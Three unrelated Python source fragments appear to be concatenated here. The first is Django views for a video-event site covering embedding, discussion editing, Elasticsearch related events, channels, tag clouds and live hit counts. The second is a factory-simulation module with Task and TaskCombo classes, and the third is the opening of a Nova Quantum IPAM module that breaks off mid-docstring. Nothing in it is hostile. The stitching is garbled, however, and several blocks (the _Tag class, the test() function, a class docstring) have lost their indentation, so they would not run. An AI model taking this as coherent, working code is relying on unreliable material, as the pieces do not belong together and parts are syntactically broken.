            return super(EventVideoView, self).can_view_event(event, request)
        if event.privacy == Event.PRIVACY_PUBLIC:
            return True
        # Non-public events may still be embedded by their owner when
        # warnings are suppressed.
        return bool(
            self.no_warning and
            request.user.is_active and request.user == event.creator
        )

    def cant_view_event(self, event, request):
        """return a response appropriate when you can't view the event"""
        context = {'error': "Not a public event", 'event': None}
        return render(request, self.template_name, context)

    def cant_find_event(self, request, slug):
        """return an appropriate response if no event can be found"""
        context = {'error': "Event not found", 'event': None}
        return render(request, self.template_name, context)

    def get_default_context(self, event, request):
        scheme = request.is_secure() and 'https' or 'http'
        root_url = '%s://%s' % (scheme, RequestSite(request).domain)
        event_path = reverse('main:event', kwargs={'slug': event.slug})
        return {
            'absolute_url': root_url + event_path,
            'embedded': self.embedded,
            'no_warning': self.no_warning,
            'no_footer': request.GET.get('no-footer'),
        }

    def get(self, request, slug):
        self.embedded = request.GET.get('embedded', 'true') == 'true'
        self.no_warning = request.GET.get('no-warning')
        response = super(EventVideoView, self).get(request, slug)
        if self.embedded:
            # ALLOWALL is what YouTube uses for sharing
            response['X-Frame-Options'] = 'ALLOWALL'
        return response
class EventDiscussionView(EventView):
    """Edit the moderator configuration of an event's discussion."""

    template_name = 'main/event_discussion.html'

    def can_edit_discussion(self, event, request):
        # this might change in the future to only be
        # employees and vouched mozillians
        if not request.user.is_active:
            return False
        if request.user != event.creator:
            return False
        # Truthy only when the event actually has a discussion.
        return Discussion.objects.filter(event=event)

    def cant_edit_discussion(self, event, user):
        return redirect('main:event', event.slug)

    def get_event_safely(self, slug, request):
        # Resolve the event and run every permission gate; any failure
        # yields an HttpResponse that the caller must return as-is.
        event = self.get_event(slug, request)
        if isinstance(event, http.HttpResponse):
            return event
        if not self.can_view_event(event, request):
            return self.cant_view_event(event, request)
        if not self.can_edit_discussion(event, request):
            return self.cant_edit_discussion(event, request)
        return event

    def get(self, request, slug, form=None):
        event = self.get_event_safely(slug, request)
        if isinstance(event, http.HttpResponse):
            return event
        discussion = Discussion.objects.get(event=event)
        if form is None:
            moderators = ', '.join(
                x.email for x in discussion.moderators.all()
            )
            form = forms.EventDiscussionForm(
                instance=discussion,
                event=event,
                initial={'moderators': moderators},
            )
        return render(request, self.template_name, {
            'event': event,
            'form': form,
        })

    @transaction.atomic
    @json_view
    def post(self, request, slug):
        event = self.get_event_safely(slug, request)
        if isinstance(event, http.HttpResponse):
            return event
        if 'cancel' in request.POST:
            return redirect('main:event', event.slug)
        discussion = Discussion.objects.get(event=event)
        form = forms.EventDiscussionForm(
            request.POST,
            instance=discussion,
            event=event,
        )
        if not form.is_valid():
            # Re-render the GET page with the bound (invalid) form.
            return self.get(request, slug, form=form)
        form.save()
        return redirect('main:event', event.slug)
@json_view
def all_tags(request):
    """Return every known tag name as JSON."""
    names = Tag.objects.all().values_list('name', flat=True)
    return {'tags': list(names)}
def related_content(request, slug):
    """Render the list of events related to the event with this slug."""
    event = get_object_or_404(Event, slug=slug)
    events, __, __ = find_related_events(event, request.user)
    curated_groups_map = collections.defaultdict(list)

    def get_curated_groups(event):
        # BUG FIX: the original called .get('event_id') with a literal
        # string key, which can never match an entry keyed by event, so
        # every event appeared to have no curated groups.  Key by the
        # event's primary key instead.
        return curated_groups_map.get(event.id)

    context = {
        'events': events,
        'get_curated_groups': get_curated_groups,
    }
    return render(request, 'main/es.html', context)
def find_related_events(
    event, user, boost_title=None, boost_tags=None, size=None,
    use_title=True, use_tags=True, explain=False
):
    """Find events related to *event* using Elasticsearch more-like-this.

    Returns a 3-tuple ``(events, scores, explanations)``:
    * events -- Event objects ordered by descending ES relevance
    * scores -- dict mapping event id -> ES score
    * explanations -- ES explanation docs (only populated when *explain*)

    Boost factors and result size default to settings values.  Privacy
    filtering happens twice: once in the ES query and again on the
    Django queryset as a safety net.
    """
    # At least one similarity signal must be enabled.
    assert use_title or use_tags
    if boost_title is None:
        boost_title = settings.RELATED_CONTENT_BOOST_TITLE
    if boost_tags is None:
        boost_tags = settings.RELATED_CONTENT_BOOST_TAGS
    if size is None:
        size = settings.RELATED_CONTENT_SIZE
    index = related.get_index()
    doc_type = 'event'
    es = related.get_connection()
    fields = ['title']
    # Only request the channel field when the event lives somewhere other
    # than (just) the default channel, where it would add no signal.
    if list(event.channels.all()) != [
            Channel.objects.get(slug=settings.DEFAULT_CHANNEL_SLUG)]:
        fields.append('channel')
    mlt_queries = []
    if use_title:
        # Similarity on the title text, weighted by boost_title.
        mlt_queries.append({
            'more_like_this': {
                'fields': ['title'],
                # 'analyzer': 'snowball',
                'docs': [
                    {
                        '_index': index,
                        '_type': doc_type,
                        '_id': event.id
                    }],
                'min_term_freq': 1,
                'max_query_terms': 20,
                'min_doc_freq': 1,
                # 'max_doc_freq': 2,
                # 'stop_words': ['your', 'about'],
                'boost': boost_title,
            }
        })
    if use_tags and event.tags.all().exists():
        fields.append('tags')
        # Similarity on shared tags, weighted by boost_tags.
        mlt_queries.append({
            'more_like_this': {
                'fields': ['tags'],
                'docs': [
                    {
                        '_index': index,
                        '_type': doc_type,
                        '_id': event.id
                    }],
                'min_term_freq': 1,
                'max_query_terms': 20,
                'min_doc_freq': 1,
                'boost': boost_tags,
            }
        })
    # 'should' makes either signal sufficient; scores accumulate.
    query_ = {
        'bool': {
            'should': mlt_queries,
        }
    }
    if user.is_active:
        if is_contributor(user):
            # Contributors may see everything except company-private events.
            query = {
                'fields': fields,
                'query': query_,
                'filter': {
                    'bool': {
                        'must_not': {
                            'term': {
                                'privacy': Event.PRIVACY_COMPANY
                            }
                        }
                    }
                }
            }
        else:
            # Employees: no privacy restriction.
            query = {
                'fields': fields,
                'query': query_
            }
    else:
        # Anonymous viewers only see public events.
        query = {
            'fields': fields,
            'query': query_,
            "filter": {
                "bool": {
                    "must": {
                        "term": {"privacy": Event.PRIVACY_PUBLIC}
                    }
                }
            }
        }
    ids = []
    query['from'] = 0
    query['size'] = size
    query['explain'] = explain
    hits = es.search(query, index=index)['hits']
    scores = {}
    explanations = []
    for doc in hits['hits']:
        _id = int(doc['_id'])
        scores[_id] = doc['_score']
        ids.append(_id)
        if explain:
            explanations.append(doc['_explanation'])
    events = Event.objects.scheduled_or_processing().filter(id__in=ids)
    # Re-apply privacy filtering on the DB side in case the ES index is stale.
    if user.is_active:
        if is_contributor(user):
            events = events.exclude(privacy=Event.PRIVACY_COMPANY)
        else:
            events = events.filter(privacy=Event.PRIVACY_PUBLIC)
    # Preserve the relevance ordering that ES returned.
    events = sorted(events, key=lambda e: ids.index(e.id))
    return (events, scores, explanations)
def channels(request):
    """Render the channel overview page.

    Builds, per top-level channel: its event count, how many
    sub-channels it has, and the list of its (depth-1) children.
    Channels with neither events nor sub-channels are omitted.
    """
    channels = []
    privacy_filter = {}
    privacy_exclude = {}
    # Work out what the viewer may see and which feed flavor to link.
    if request.user.is_active:
        if is_contributor(request.user):
            feed_privacy = 'contributors'
            privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
        else:
            feed_privacy = 'company'
    else:
        privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
        feed_privacy = 'public'
    events = Event.objects.filter(status=Event.STATUS_SCHEDULED)
    if privacy_filter:
        events = events.filter(**privacy_filter)
    elif privacy_exclude:
        events = events.exclude(**privacy_exclude)
    # Depth-1 children only (channels whose parent is itself a root).
    children_channels = Channel.objects.filter(
        parent__parent__isnull=True,
        parent__isnull=False,
    )
    parents = collections.defaultdict(list)
    for channel in children_channels:
        parents[channel.parent_id].append(channel)
    # Root channels, minus the default channel which is shown elsewhere.
    channels_qs = (
        Channel.objects
        .filter(parent__isnull=True)
        .exclude(slug=settings.DEFAULT_CHANNEL_SLUG)
    )
    # make a dict of parental counts
    subchannel_counts = {}
    qs = (
        Channel.objects
        .filter(parent__isnull=False)
        .values('parent_id')
        .order_by()  # necessary because the model has a default ordering
        .annotate(Count('parent'))
    )
    for each in qs:
        subchannel_counts[each['parent_id']] = each['parent__count']
    # make a dict of events counts by channel
    event_counts = {}
    qs = (
        Event.channels.through.objects.filter(event__in=events)
        .values('channel_id')
        .annotate(Count('channel'))
    )
    for each in qs:
        event_counts[each['channel_id']] = each['channel__count']
    for channel in channels_qs:
        event_count = event_counts.get(channel.id, 0)
        subchannel_count = subchannel_counts.get(channel.id, 0)
        subchannels = parents.get(channel.id, [])
        # Hide channels that would render as an empty row.
        if event_count or subchannel_count:
            channels.append((
                channel,
                event_count,
                subchannel_count,
                subchannels
            ))
    data = {
        'channels': channels,
        'feed_privacy': feed_privacy,
    }
    return render(request, 'main/channels.html', data)
class _Tag(object):
def __init__(self, name, count):
self.name = name
self.count = count
def tag_cloud(request, THRESHOLD=1):
    """Render a cloud of tags used on more than THRESHOLD visible events."""
    qs = (
        Event.tags.through.objects
        .values('tag_id')
        .annotate(Count('tag__id'))
    )
    if request.user.is_active:
        if is_contributor(request.user):
            # because of a bug in Django we can't use qs.exclude()
            qs = qs.filter(
                Q(event__privacy=Event.PRIVACY_CONTRIBUTORS) |
                Q(event__privacy=Event.PRIVACY_PUBLIC)
            )
    else:
        qs = qs.filter(event__privacy=Event.PRIVACY_PUBLIC)
    # id -> name lookup so we avoid one query per tag below.
    tags_map = dict(
        (x['id'], x['name'])
        for x in Tag.objects.all().values('id', 'name')
    )
    tags = [
        _Tag(tags_map[row['tag_id']], row['tag__id__count'])
        for row in qs.values('tag__id__count', 'tag_id')
        if row['tag__id__count'] > THRESHOLD
    ]
    context = {
        'tags': cloud.calculate_cloud(tags, steps=10),
    }
    return render(request, 'main/tag_cloud.html', context)
def permission_denied(request, slug):
    """Explain to the viewer why this event is off limits to them."""
    event = get_object_or_404(Event, slug=slug)
    groups = CuratedGroup.objects.filter(event=event).order_by('name')
    context = {
        'event': event,
        'is_contributor': is_contributor(request.user),
        'is_company_only': event.privacy == Event.PRIVACY_COMPANY,
        'curated_groups': [
            {'name': group.name, 'url': group.url}
            for group in groups
        ],
    }
    return render(request, 'main/permission_denied.html', context)
def contributors(request):
    """Render the contributors page, caching the Mozillians API lookup."""
    cache_key = 'mozillians_contributors'
    # Key on the configured contributor list so config changes bust the cache.
    cache_key += hashlib.md5(str(settings.CONTRIBUTORS)).hexdigest()[:10]
    users = cache.get(cache_key)
    if users is None:
        users = mozillians.get_contributors()
        # Refresh at most once a day.
        cache.set(cache_key, users, 60 * 60 * 24)
    context = {'users': reversed(users)}
    return render(request, 'main/contributors.html', context)
@never_cache
@json_view
def event_livehits(request, id):
    """Return (and, on POST during a live event, increment) the live hit count.

    Each viewer is fingerprinted (user id when authenticated, otherwise
    user-agent + language + IP) and only counted once per 12 hours.
    """
    event = get_object_or_404(Event, id=id)
    if request.method == 'POST' and event.is_live():
        live_hits, _ = EventLiveHits.objects.get_or_create(event=event)
        if request.user.is_authenticated():
            cache_key = 'event_livehits-%d' % request.user.id
        else:
            cache_key = ''
        for thing in (
            'HTTP_USER_AGENT',
            'HTTP_ACCEPT_LANGUAGE',
            # BUG FIX: was 'REMOVE_ADDR', a typo that never matches a
            # META key, so the client IP never made it into the
            # anonymous fingerprint.
            'REMOTE_ADDR',
        ):
            value = request.META.get(thing)
            if value:
                cache_key += value
        cache_key = 'event_livehits' + hashlib.md5(cache_key).hexdigest()
        cache_key = cache_key[:30]
        counted = cache.get(cache_key)
        total_hits = live_hits.total_hits
        if not counted:
            # let's assume the longest possible time it's live is 12 hours
            cache.set(cache_key, True, 60 * 60 * 12)
            # we need to increment!
            (
                EventLiveHits.objects.filter(event=event)
                .update(total_hits=F('total_hits') + 1)
            )
            total_hits += 1
    else:
        try:
            total_hits = EventLiveHits.objects.get(event=event).total_hits
        except EventLiveHits.DoesNotExist:
            total_hits = 0
    return {'hits': total_hits}
@json_view
def event_processing_timenails(request, slug):
    """Return thumbnails of pictures captured up to a fraction of the event."""
    event = get_object_or_404(Event, slug=slug)
    if not event.duration:
        return {'pictures': []}
    form = forms.ProcessingTimenailsForm(request.GET)
    if not form.is_valid():
        return http.HttpResponseBadRequest(form.errors)
    percentage = min(100.0, form.cleaned_data['percent'] or 100.0)
    max_ = form.cleaned_data['max']
    # Cut-off timestamp within the event's duration.
    point = event.duration * percentage / 100.0
    qs = Picture.objects.filter(
        event=event,
        timestamp__isnull=False,
        timestamp__lte=point,
    ).order_by('-timestamp')
    pictures_ = []
    for picture in qs[:max_]:
        # NOTE! This code is the same as used
        # in then EventChaptersThumbnailsView.get view.
        thumb = thumbnail(picture.file, '160x90', crop='center')
        pictures_.append({
            'id': picture.id,
            'timestamp': picture.timestamp,
            'thumbnail': {
                'url': thumb.url,
                'width': thumb.width,
                'height': thumb.height,
            },
        })
    # Newest-first slice, but the response is oldest-first.
    pictures_.reverse()
    return {'pictures': pictures_}
@never_cache
@json_view
def event_status(request, slug):
    """Return the status of the event with this slug; 404 when unknown."""
    rows = Event.objects.filter(slug=slug).values('status')
    for row in rows:
        return {'status': row['status']}
    raise http.Http404(slug)
@json_view
def thumbnails(request):
    """Return thumbnail URLs (given width/height) for an event's pictures."""
    form = forms.ThumbnailsForm(request.GET)
    if not form.is_valid():
        return http.HttpResponseBadRequest(form.errors)
    data = form.cleaned_data
    geometry = '%sx%s' % (data['width'], data['height'])
    event = get_object_or_404(Event, id=data['id'])
    urls = []
    for picture in Picture.objects.filter(event=event).order_by('created'):
        thumb = thumbnail(picture.file, geometry, crop='center')
        urls.append(thumb.url)
    return {'thumbnails': urls}
|
|
# // Copyright (c) <2014> <Brian Wheatman>
from collections import Counter
import random
import copy
# the basic task
class Task():
    """One processing station ("robot") in the factory simulation.

    All mutable simulation state lives in ``self.startState`` (see the
    index map after __init__).  Several slots are single-element lists so
    they can be mutated in place and shared by reference.
    """

    def __init__(self, set_inputs, inputs_to_output, set_up_time, processing_time,\
        output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats, robot_id, \
        price_input, price_output, task_name=""):
        # each task will store
        # # what the task can take (list of strings)
        # # how many inputs it takes a round (list of ints)
        # # set up time (float)
        # # processing time for each (float)
        # # what the robot outputs (string)
        # # how many outputs made in a round (int)
        # # items waiting to be processed on [list of ints]
        # # items already processed (list of int)
        # # whether or not the robot is currently in a setup phase (Boolean)
        # # a counter (list of int)
        # # whether or not the task is in use (boolean)
        # # whether or not the task is broken (boolean)
        # # stats about the task (list)
        # # # [[time on, time setting up, time producing, idle time, total time], number of exports, [average length of queues]]
        # one average-queue-length slot per input type
        stats[2] = [0]*len(set_inputs)
        self.startState = [set_inputs, inputs_to_output, set_up_time, processing_time,\
            output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats]
        self.id = robot_id
        # pristine copy used by reset()
        self.save_startState = copy.deepcopy(self.startState)
        self.input_price = price_input
        self.output_price = price_output
        self.task_name = task_name
        self.push = False
        self.number_push = 1  # for now push all

    """
    state[0] = input list
    state[1] = inputs to outputs
    state[2] = set up times
    state[3] = processing times
    state[4] = output
    state[5] = outputs a timestep
    state[6] = items in queue
    state[7] = finished items
    state[8] = if in set up
    state[9] = counter
    state[10] = if it is on or off, true is off false is on
    state[11] = if broken
    state[12] = stats
    state[12][0] = time information
    state[12][0][0] = time on
    state[12][0][1] = time seting up
    state[12][0][2] = time making something
    state[12][0][3] = time starved
    state[12][0][4] = total time
    state[12][1] = total number of outputs
    state[12][2] = average length of queue
    """

    def __repr__(self):
        # the task will tell about itself when you print it
        state = self.startState
        a0 = self.task_name  # + "\n"
        a1 = "this task is done by robot " + str(self.id) + "\n"
        a = "This task takes input " + str(state[0]) + "\n"
        b = "It takes " + str(state[1]) + " inputs each round.\n"
        c = "This task takes " + str(state[2]) + " minutes to set up.\n"
        d = "This task takes " + str(state[3]) + " minutes to process each item.\n"
        e = "This task outputs " + state[4] + "\n"
        f = "It makes " + str(state[5]) + " outputs each round.\n"
        g = "This task has " + str(state[6]) + " items waiting.\n"
        h = "This task has " + str(state[7]) + " items finished.\n"
        if state[8][0]:
            i = "This task is currently in the setup phase.\n"
        else:
            i = "This task is not currently in the setup phase.\n"
        if state[10][0]:
            j = "This task is currently off.\n"
        else:
            j = "This task is currently on.\n"
        if state[11][0]:
            k = "This task is currently broken.\n"
        else:
            k = "This task is not currently broken.\n"
        l = "counter is at " + str(state[9][0]) + ".\n"
        m = "this task has been running for " + str(state[12][0][0]) + " minutes\n"
        n = "this task has exported " + str(state[12][1]) + " items\n"
        return a0  # +a1+a#+b+c+d+e+f+g+h+i+j+k+l+m+n # how much to show to make it easier to display

    # to change what the task takes as input
    def set_input(self, input_list):
        self.startState[0] = input_list

    # to change the set up times
    def set_set_up_time(self, set_up_time):
        self.startState[2] = set_up_time

    # to change the processing times
    def set_processing_time(self, processing_time):
        self.startState[3] = processing_time

    # to change what the output is
    def set_output(self, output):
        self.startState[4] = output

    # to add items to the group that will be processed
    def add_items_to_queue(self, index_of_item, number_of_items_to_add):
        self.startState[6][index_of_item] += number_of_items_to_add

    # to edit the queue as a whole
    def set_queue(self, queue):
        self.startState[6] = queue

    def remove_items(self, items_to_remove):
        """Take *items_to_remove* finished items out; True on success.

        BUG FIX: the original fell off the end (implicitly returning
        None) when there were not enough finished items; now it returns
        False explicitly, matching the documented boolean contract.
        """
        if self.startState[7][0] >= items_to_remove:  # if there are enough items to remove
            self.startState[7][0] -= items_to_remove  # remove the item
            return True
        return False

    # set how many items have been finished
    def set_finished_items(self, finished):
        self.startState[7] = finished

    # take out of or put into set up
    def set_mode(self, mode):
        self.startState[8][0] = mode

    # set the counter
    def set_counter(self, counter):
        self.startState[9] = counter

    # it is posiple to add the ability to break and fix robots, but this is not currently in use
    # checking if the task can be fixed
    def fix(self):
        if random.random() <= 1:  # probability of being able to fix it
            self.startState[11][0] = False

    # checking if the task broke
    def damage(self):
        if random.random() <= 1:  # probability of it breaking
            self.startState[11][0] = True

    # set the stats
    def set_stats(self, stats):
        self.startState[12] = stats

    # turn the task on or off
    def on_off(self):
        if self.startState[10][0] == False:  # if it is on
            self.startState[10][0] = True  # turn it off
            self.startState[8][0] = True  # make it need set up
            self.startState[9][0] = 0  # set the counter to 0
        else:
            self.startState[10][0] = False  # turn it on
            self.startState[8][0] = True  # make it need set up
            self.startState[9][0] = 0  # set the counter to 0

    # reset the task back to its starting values
    def reset(self):
        self.startState = copy.deepcopy(self.save_startState)

    # weather or not the task auto pushes
    def push_switch(self):
        if self.push:
            self.push = False
        else:
            self.push = True

    # how many push at a time
    def set_push_number(self, number):
        self.number_push = number

    def getNextValues(self, state):
        """Advance the task one timestep; return (new state, status string).

        The state lists are mutated in place; the returned state is the
        same 13-slot structure with the updated values.
        """
        # giving the variables names so they are easier to use
        [set_inputs, inputs_to_output, set_up_time, processing_times,\
            output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats] = state
        len_items_waiting = len(items_waiting)  # to avoid looping
        # check if the task can be used
        if broken[0]:
            pass
        elif on_off[0]:
            pass
        elif in_set_up[0]:  # if it is in set up
            if counter[0] >= set_up_time:  # if time passed is equal to set up time
                in_set_up[0] = False  # take it out of set up mode
                counter[0] = 0  # and reset the counter
        else:  # if it is not in setup mode
            if counter[0] >= processing_times:  # if enough time has passed that an item has been made
                # check if I could use an if any construction here
                dummy = 0  # dummy variable
                for i in range(len_items_waiting):  # check enumerate
                    if items_waiting[i] < inputs_to_output[i]:  # and if there are still enough items waiting to be made
                        dummy += 1
                if dummy == 0:
                    for i in range(len_items_waiting):
                        items_waiting[i] -= inputs_to_output[i]  # remove items from the items waiting
                    items_done[0] += output_a_round  # add items to the items done
                    stats[1] += output_a_round  # keep track of how many outputs have been done total
                    counter[0] = 0  # reset the counter
        a = "This task has " + str(state[6]) + " items waiting. "
        b = "This task has " + str(state[7]) + " items finished. "
        output = a+b
        stats[0][4] += 1  # total time
        if in_set_up[0]:
            if not on_off[0]:
                counter[0] += 1  # always increase the counter if it is setting up and on
        if not in_set_up[0]:
            dummy2 = 0  # dummy variable
            for i in range(len_items_waiting):
                if items_waiting[i] < inputs_to_output[i]:  # and if there are still enough items waiting to be made
                    dummy2 += 1
            if dummy2 == 0:
                counter[0] += 1  # only increase the counter if there are items that the robot could be processing
                stats[0][2] += 1  # time making something
        if not broken[0] and not on_off[0]:
            stats[0][0] += 1  # keep track of the total number of time steps
            if in_set_up[0]:
                stats[0][1] += 1  # time in set up
        stats[0][3] = stats[0][0] - stats[0][1] - stats[0][2]  # time starved
        for i in range(len(stats[2])):
            if stats[0][4] == 0:  # total time
                stats[2][i] = 0  # average length of queue
            else:
                stats[2][i] = (float(stats[2][i]*(stats[0][4]-1)+items_waiting[i]))/stats[0][4]  # average length of queue
        state = [set_inputs, inputs_to_output, set_up_time, processing_times,\
            output, output_a_round, items_waiting, items_done, in_set_up, counter, on_off, broken, stats]
        return (state, output)
# to have a group of tasks connected in a push way
class TaskCombo():
    """A group of Tasks wired together in a push-based flow network."""

    def __init__(self, task_group, limitations={}, money=0,\
        period_cost=0, length_period=2400, number_periods=2):
        self.task_successors = make_dict(task_group)  # create dictionaries that keep track of flow
        stats = [0]
        self.startState = [task_group, stats]  # the task list and stats
        self.save_startState = copy.deepcopy(self.startState)  # to be able to reset
        self.cash = money
        self.save_money = copy.deepcopy(self.cash)
        self.limitations = limitations  # of the form lim[T1] = T2, meaning T1 cant sell more than T2
        self.time_limit = length_period*number_periods  # time to the end of the game
        self.period_cost = period_cost  # how much the bills are per period
        self.length_period = length_period  # how long each period is
        self.number_periods = number_periods  # how many periods there are
        self.push_direction = {}  # what direction is everythng currently pushing
        for task in self.task_successors:  # for each task that has something to push to
            if self.task_successors[task][0] in task_group:  # if it can only push to one task
                self.push_direction[task] = self.task_successors[task]
            else:  # if it has multiple options
                self.push_direction[task] = self.task_successors[task][0]  # give it the first option
        self.sell_amounts = {}  # how much has each task sold
        for task in task_group:
            self.sell_amounts[task] = 0

    def __repr__(self):
        # when printed, print out the information for each task and the total time
        state = self.startState
        string = ""
        for i in range(len(state[0])):
            string = string + "task " + str(i+1) + " \n" + state[0][i].__repr__() + " \n"
        string2 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX the total time passed is " + str(state[1][0]) + " XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n"
        return string + string2

    def update_clock(self, time):
        self.startState[1][0] = time

    # to push
    def push_action(self, task, number, target):  # task = what task is pushing; number is how many to push; target is where they are going
        if task.startState[7][0] >= number:  # if there is more than the number to push
            task.remove_items(number)  # remove that number
            target[0].add_items_to_queue(target[1], number)  # and add to the target
        elif task.startState[7][0] >= 1:  # if there is less than the number to push
            target[0].add_items_to_queue(target[1], task.startState[7][0])  # add all of them to the queue
            task.remove_items(task.startState[7][0])  # and remove them from the task

    # change where a task will push
    def change_push_direction(self, task):
        for i in range(len(self.task_successors[task])):
            if self.push_direction[task] == self.task_successors[task][i]:
                self.push_direction[task] = self.task_successors[task][(i+1) % len(self.task_successors[task])]  # cycle through all of the options
                break

    # to reset
    def reset(self):
        self.startState = copy.deepcopy(self.save_startState)
        self.cash = copy.deepcopy(self.save_money)

    def add_money(self, amount):
        self.cash += amount

    def lose_money(self, amount):
        self.cash -= amount

    def check_for_splits(self, task_group):
        """Return True when some task pushes to a task outside *task_group*.

        BUG FIX: the loop body referenced an undefined name ``bot``
        (NameError at runtime); it now uses the loop variable ``task``.
        """
        for task in task_group:
            if self.task_successors[task][0] not in task_group:
                return True
        return False

    def getNextValues(self, state):
        """Advance every task one timestep, pushing items along the flow."""
        task_path = self.task_successors  # the dictionary that deals with flow
        list_of_tasks = state[0]  # what tasks are in this system
        output_list = [0]*len(list_of_tasks)  # declaring the output list
        new_state_of_task = [0]*len(list_of_tasks[0].startState)  # declaring the list that will be the next state
        len_list_of_tasks = len(list_of_tasks)  # to avoid looping
        # adding and removing items accordingly to push them through the system
        for i in range(len_list_of_tasks):  # for each task
            if list_of_tasks[i] in task_path:  # if it is not an end
                [successor, index_of_input] = task_path[list_of_tasks[i]]
                if list_of_tasks[i].push:  # if the task is on auto push
                    self.push_action(list_of_tasks[i], 100000000, self.push_direction[list_of_tasks[i]])  # push all
        # resetting the tasks with the changes the last pass through had on them
        for i in range(len_list_of_tasks):
            (new_state_of_task, output_list[i]) = list_of_tasks[i].getNextValues(list_of_tasks[i].startState)  # getting the new values for each task
            list_of_tasks[i].set_queue(new_state_of_task[6])  # set the value
            list_of_tasks[i].set_finished_items(new_state_of_task[7])  # set the value
            list_of_tasks[i].set_counter(new_state_of_task[9])  # set the value
            list_of_tasks[i].set_stats(new_state_of_task[12])  # set the value
            list_of_tasks[i].set_mode(new_state_of_task[8][0])  # set the value
        # the next state
        time = state[1][0]+1
        stats = [time]
        self.update_clock(time)
        new_state_plus_stats = [list_of_tasks, stats]
        return (new_state_plus_stats, output_list)
# create a dictionary to keep track of how the items flow through the factory
def make_dict(task_group):
    """Map each producing task to (successor, input_slot) describing flow.

    A producer's output string (startState[4]) is matched against every
    task's input list (startState[0]).  For each consuming task one entry
    is recorded: the consumer and the index of the matching input slot
    (the last matching slot when an input name repeats).  A producer with
    several consumers accumulates nested ``(previous, new)`` tuples.
    """
    task_successors = {}
    for producer in task_group:
        produced = producer.startState[4]
        for consumer in task_group:
            inputs = consumer.startState[0]
            if produced not in inputs:
                continue
            # find which input slot of the consumer accepts this output
            slot = None
            for k, wanted in enumerate(inputs):
                if wanted == produced:
                    slot = k
            entry = (consumer, slot)
            # each task is the key to which robot it passes on to and which slot its output goes into
            if producer in task_successors:
                task_successors[producer] = (task_successors[producer], entry)
            else:
                task_successors[producer] = entry
    return task_successors
# make the grid to display
def make_grid(task_group):
    """Lay the task flow network out as a rectangular grid for display.

    Returns ``(task_grid, grid_width, grid_length)`` where task_grid is a
    list of rows (one per start-to-end path), left-padded with None so
    all rows share the longest path's length; a task appearing on more
    than one path is shown only the first time.
    """
    task_group_edit = task_group[:]  # an editable group of tasks
    task_successors = make_dict(task_group)  # make the dictionairy
    following_task = {}  # a dictionairy that doesn't include the index of the input
    for task in task_successors:
        if type(task_successors[task][0]) != tuple:
            following_task[task] = [task_successors[task][0]]
        else:
            following_task[task] = [term[0] for term in task_successors[task]]
    ends = []
    starts = []
    not_starts = []  # to help find starts
    for task in task_group:
        if task in following_task:
            for item in following_task[task]:
                if item not in not_starts:
                    not_starts.append(item)  # if something pushes to it it is not a start
        else:
            ends.append(task)  # if it pushes to nothing it is an end
    starts = task_group[:]
    for item in not_starts:
        starts.remove(item)

    # to find all the path from one start to one ends
    def find_all_paths(graph, start, end, path=[]):
        # NOTE: the mutable default is safe here because 'path' is only
        # rebound (path + [start]), never mutated in place.
        path = path + [start]
        if start == end:  # if the start is the end, the path has been found
            return [path]
        # BUG FIX: was graph.has_key(start), which only exists on
        # Python 2 dicts; the 'in' operator behaves identically and
        # also works on Python 3.
        if start not in graph:  # if the start has no successors there is not path
            return []
        paths = []
        for node in graph[start]:  # for all of the successors of the start
            if node not in path:  # if that node is not already in the path
                newpaths = find_all_paths(graph, node, end, path)
                for newpath in newpaths:
                    paths.append(newpath)
        return paths

    paths = []
    for start in starts:  # for every start
        for end in ends:  # and every end
            # compute once instead of twice (was called again to append)
            found = find_all_paths(following_task, start, end)
            if found != []:  # if there is a path
                paths.append(found)  # append all of the paths
    task_grid = []  # the grid of the tasks
    for path in paths:
        for item in path:
            task_grid.append(item)  # append all of the paths found
    grid_width = len(task_grid)  # start guess for the length
    grid_length = 0
    # find the true length by finding the longest path
    for row in task_grid:
        if len(row) > grid_length:
            grid_length = len(row)
    # make all the rows the same lenth
    for row in task_grid:
        if len(row) != grid_length:
            for dif in range(grid_length-len(row)):
                row.insert(0, None)
    # if the task has already been placed, only show the first one
    for i in range(grid_width):
        for j in range(grid_length):
            if task_grid[i][j] in task_group_edit:
                task_group_edit.remove(task_grid[i][j])
            else:
                task_grid[i][j] = None
    task_grid = [row for row in task_grid if row != [None]*grid_length]  # removing empty rows from the task grid
    grid_width = len(task_grid)
    grid_length = len(task_grid[0])
    return (task_grid, grid_width, grid_length)
# to test the simulation without the gui
# allows you to have it run for n steps
def test(a, n = 50):
state = a.startState
for i in range(n):
(state, output) = a.getNextValues(state)
#print output
print a
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from nova import db
from nova import exception
from nova import flags
from nova import ipv6
from nova import log as logging
from nova.network import manager
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
def get_ipam_lib(net_man):
    """Factory: return the Nova-DB-backed Quantum IPAM implementation.

    net_man: the "parent" network manager the IPAM lib delegates to.
    """
    return QuantumNovaIPAMLib(net_man)
class QuantumNovaIPAMLib(object):
"""Implements Quantum IP Address Management (IPAM) interface
using the local Nova database. This implementation is inline
with how IPAM is used by other NetworkManagers.
"""
    def __init__(self, net_manager):
        """Holds a reference to the "parent" network manager, used
        to take advantage of various FlatManager methods to avoid
        code duplication.
        """
        self.net_manager = net_manager
        # NOTE(s0mik) : If DHCP is not in use, we need to timeout IPs
        # periodically. See comment in deallocate_ips_by_vif for more
        self.net_manager.timeout_fixed_ips = not self.net_manager.DHCP
    def create_subnet(self, context, label, tenant_id,
                      quantum_net_id, priority, cidr=None,
                      gateway=None, gateway_v6=None, cidr_v6=None,
                      dns1=None, dns2=None):
        """Re-use the basic FlatManager create_networks method to
        initialize the networks and fixed_ips tables in Nova DB.
        Also stores a few more fields in the networks table that
